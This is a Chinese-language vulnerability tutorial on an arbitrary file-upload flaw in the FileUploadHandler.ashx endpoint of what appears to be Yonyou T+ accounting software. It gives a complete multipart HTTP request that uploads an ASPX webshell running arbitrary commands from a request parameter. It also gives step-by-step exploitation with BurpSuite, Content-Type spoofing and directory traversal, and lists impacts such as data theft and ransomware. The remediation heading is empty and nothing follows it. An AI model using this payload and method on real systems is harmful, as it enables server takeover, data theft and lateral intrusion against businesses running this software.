免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。
目录
一、漏洞技术解析
- 漏洞核心机制 FileUploadHandler.ashx 作为通用文件处理接口,存在未严格校验上传文件类型、扩展名过滤不完整、路径控制缺失等缺陷。攻击者可构造特殊HTTP请求:
- 绕过前端校验直接上传ASP/ASPX/PHP/JSP等可执行文件
- 利用目录穿越符号(../)指定Web根目录下的写入路径
- 结合系统业务逻辑缺陷实现二次漏洞利用
- 攻击载荷示例
POST /tplus/FileUploadHandler.ashx HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryabc ------WebKitFormBoundaryabc Content-Disposition: form-data; name="file"; filename="shell.aspx" Content-Type: application/octet-stream <%@ Page Language="C#" %> <script runat="server"> protected void Page_Load(object sender, EventArgs e) { System.Diagnostics.Process.Start(Request["cmd"]); } </script>二、漏洞验证流程
- 安全测试步骤(需授权) ① 使用BurpSuite拦截正常文件上传请求 ② 修改Content-Type为image/png,保持恶意文件扩展名 ③ 插入目录穿越字符:filename="../../scripts/cmd.aspx" ④ 观察返回包中的物理路径泄露信息 ⑤ 通过Web访问路径验证文件是否生效
三、潜在风险影响
- 数据层面
- 客户隐私数据泄露(订单/财务/供应链信息)
- 业务数据库被拖取(通过webshell执行SQL指令)
- 敏感文件加密勒索(通过系统权限遍历文件系统)
- 系统层面
- 服务器沦陷为僵尸网络节点
- 横向渗透至内网核心系统(OA/ERP)
- 供应链攻击跳板(针对T+系统用户)
四、企业级修复